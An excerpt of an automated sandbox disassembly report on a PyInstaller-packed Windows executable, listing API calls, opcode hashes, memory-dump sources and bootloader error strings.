                                                                                      • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                      • Instruction ID: 9ec7a50326e72c648eb3da816bd299455c310c6075a27c717bb2fe826acadd27
                                                                                      • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                      • Instruction Fuzzy Hash: 11812672A0878146D7B8EF59908037ABE91FB45794F804339DAAD1BBC5DF7CD4808B51
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
                                                                                      • Instruction ID: d19ecf6a07694de92a970829b8ee1b19c68cf4303948c21a4eb42eb575a46c9b
                                                                                      • Opcode Fuzzy Hash: 21aaab296e2e64a79b20cf98ea2699a9ab0529386423cc159892306e5cd43e00
                                                                                      • Instruction Fuzzy Hash: 29611822E0C25246F7E4AAF8949063CE684AF40760FD44239D63D6FFCDDE6DE84087A0
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                      • Instruction ID: fc0465b5dfed097d5d6809c1a56a267393387fb7df778b350a16f40333f69d87
                                                                                      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                      • Instruction Fuzzy Hash: 3651DB36A1865181E7A8AB69C44023C7BA1FB54B68F644331CE5C2B7D4CF3AE983C7D1
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                      • Instruction ID: 8f2a1c24a7a6ed98ca014aa88bec463153c1d256d51793798b21af49a040e540
                                                                                      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                      • Instruction Fuzzy Hash: 9651B976B1465181E7A89B69C44023CBBA4FB45B58F644331CEAD2B7D4CB3AE883C7D1
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                      • Instruction ID: 0ddb65b8b603693cf271af245056839ea470e22eb88f36632d461e39dcaa57c7
                                                                                      • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                      • Instruction Fuzzy Hash: 5751B936B1865181E7A89B69C0402387BA4EB45F58F644331DE5D2B7D4CB3AE893C7D1
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                      • Instruction ID: d764abf1786bbe43ee9caf652a1e4465538d1e3835f1f3430cee5c7059a1cc68
                                                                                      • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                      • Instruction Fuzzy Hash: 2E51D432B1865181E7A99F68C04023CABA4EB45B58FA44231DE5C6B7D4DF3AE8C3C791
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                      • Instruction ID: 271c10446fef1b8845aa402920efc6e731eb1477bb5d029139dc478852c93668
                                                                                      • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                      • Instruction Fuzzy Hash: 5251A537B1865585E7A8AB69C050338BBA0EB44F58F644231CE5C2B7D5CB3AE893C7D1
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                      • Instruction ID: 22bcf95fcafdd8953d5149a49afe1526d642d8a63037afb593aa63944b2e6a11
                                                                                      • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                      • Instruction Fuzzy Hash: C451C636B1865181E7A8AB69C040238BBA5EB45F58F644231CE5D2B7D4CF3AEC83C7D1
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                      • Instruction ID: cae257b52e8612174e525b5274c84ca7c84b6a3ca155eed4536c677ec6b2967a
                                                                                      • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                      • Instruction Fuzzy Hash: D241836280978E05EBED99D80524674AE829F12BE0F981374DDB97F3C3C90DE5C68262
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 485612231-0
                                                                                      • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                      • Instruction ID: 1ff1c62d222bb2ad9b95b14c477e20b6bca722301d51f24271b91997921df612
                                                                                      • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                      • Instruction Fuzzy Hash: FF415CB2714E4582EF48DF66DA14169B391FB48FD0B899032DE1DAFB98DE3CC4418340
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: AddressErrorLastProc
                                                                                      • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                      • API String ID: 199729137-3427451314
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F3DD45F4,00000000,00007FF7F3DD1985), ref: 00007FF7F3DD93C9
                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7F3DD86B7,?,?,00000000,00007FF7F3DD3CBB), ref: 00007FF7F3DD822C
                                                                                        • Part of subcall function 00007FF7F3DD2810: MessageBoxW.USER32 ref: 00007FF7F3DD28EA
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                      • API String ID: 1662231829-930877121
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                      • String ID: P%
                                                                                      • API String ID: 2147705588-2959514604
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                      • String ID: Needs to remove its temporary files.
                                                                                      • API String ID: 3975851968-2863640275
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: -$:$f$p$p
                                                                                      • API String ID: 3215553584-2013873522
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: f$f$p$p$f
                                                                                      • API String ID: 3215553584-1325933183
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                      • API String ID: 2050909247-3659356012
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                      • API String ID: 2050909247-3659356012
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 849930591-393685449
                                                                                      • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                      • Instruction ID: 87e55a07004d764e5f578cf396403638c36e6746f4176f38b9332c186a714f53
                                                                                      • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                      • Instruction Fuzzy Hash: C7D1813290874186EBA0EFA5D4403ADB7A4FB45788F900135EE9D6B7D9DF38E485C790
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7F3DEF0AA,?,?,0000021C07578B08,00007FF7F3DEAD53,?,?,?,00007FF7F3DEAC4A,?,?,?,00007FF7F3DE5F3E), ref: 00007FF7F3DEEE8C
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7F3DEF0AA,?,?,0000021C07578B08,00007FF7F3DEAD53,?,?,?,00007FF7F3DEAC4A,?,?,?,00007FF7F3DE5F3E), ref: 00007FF7F3DEEE98
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeLibraryProc
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3013587201-537541572
                                                                                      • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                      • Instruction ID: 37933d31b63b379ae2dcbb5bd94ec17a9785335afdd77bd7dc2312315796d10e
                                                                                      • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                      • Instruction Fuzzy Hash: 68414761B09A1241EB99EB929800275A691BF48BD0FC84235DD3D6F3C4DF7CE88583A1
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2C9E
                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2D63
                                                                                      • MessageBoxW.USER32 ref: 00007FF7F3DD2D99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                      • API String ID: 3940978338-251083826
                                                                                      • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                      • Instruction ID: 2512fbdb768b8aa149cdf9070e354e8befd28865d8375289a040942718875d56
                                                                                      • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                      • Instruction Fuzzy Hash: B031F622B08B4142E760BB65B8502ABB695BF887C8F810135EF6D6B7D9DF3CD546C390
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD4D
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD5B
                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDD85
                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDDF3
                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7F3DDDF7A,?,?,?,00007FF7F3DDDC6C,?,?,?,00007FF7F3DDD869), ref: 00007FF7F3DDDDFF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 2559590344-2084034818
                                                                                      • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                      • Instruction ID: 49d4018a666ae8789ed039aaefa646c712ae924cde501a2b2e9f5a88cd3f76e4
                                                                                      • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                      • Instruction Fuzzy Hash: 5A319321B1A741D1EF91AB92A4006B5B394FF48BA4F994535DD3D2E3C8DE3CE44482B0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                      • API String ID: 2050909247-2434346643
                                                                                      • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                      • Instruction ID: 2e98aeb31ad3609f410d40d03e7cd1250b60627e667e6268e44fecb39f8131b8
                                                                                      • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                      • Instruction Fuzzy Hash: C5414221A1C68691EBA1EBA0E4552E9B321FF44384FC00132EA7D6B6D9DF3CE515C7E0
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7F3DD351A,?,00000000,00007FF7F3DD3F1B), ref: 00007FF7F3DD2AA0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                      • API String ID: 2050909247-2900015858
                                                                                      • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                      • Instruction ID: 2338e62373cab731f4bafcc08fc800363c258485d9f93c51be2473388b693a90
                                                                                      • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                      • Instruction Fuzzy Hash: 2921A37261978242E7A0ABA1F8817E6B394FB883C0F800135FE9D6B699DF3CD1458790
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2506987500-0
                                                                                      • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                      • Instruction ID: 6397378a33eb6dfd7396cd54dd04011d575d1aab3762eaaa148440c2ef8a86e4
                                                                                      • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                      • Instruction Fuzzy Hash: E3216D24A0E64341F7DC73A19A52239DA525F447B0FC14734DC7E6EBC6DD2CB48043A2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                      • String ID: CONOUT$
                                                                                      • API String ID: 3230265001-3130406586
                                                                                      • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                      • Instruction ID: 9b6a9472490d9b769d5be196821b737aa5cb5c82b1e9c9949af106ac281c8a4d
                                                                                      • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                      • Instruction Fuzzy Hash: 53119A21718A4186E790AB52E894329A2A0FF88BE4F800234DD7E9F7D4DF7CD5148790
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8EFD
                                                                                      • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8F5A
                                                                                        • Part of subcall function 00007FF7F3DD9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F3DD45F4,00000000,00007FF7F3DD1985), ref: 00007FF7F3DD93C9
                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD8FE5
                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD9044
                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD9055
                                                                                      • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7F3DD3FA9), ref: 00007FF7F3DD906A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 3462794448-0
                                                                                      • Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                      • Instruction ID: 40145a9dcc7ae26b6c931567a13f5dbdef37355701136006c814a1a5faf4dccd
                                                                                      • Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
                                                                                      • Instruction Fuzzy Hash: 3441D961A1968281EBB0BB61B4402BAB394FF84BC4F844135DF6DAB7C9DE3DE511C790
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB2D7
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB30D
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB33A
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB34B
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB35C
                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF7F3DE4F11,?,?,?,?,00007FF7F3DEA48A,?,?,?,?,00007FF7F3DE718F), ref: 00007FF7F3DEB377
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 2506987500-0
                                                                                      • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                      • Instruction ID: c5d781daee3a063b7547994cd98520d5f517218cb54cb10e4bd36e75af17cfe5
                                                                                      • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                      • Instruction Fuzzy Hash: D8113A20E0D64282F7DC73A19642139D9469F447A0FD54734DC7E6EAD6DE6CB48143A2
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F3DD1B6A), ref: 00007FF7F3DD295E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
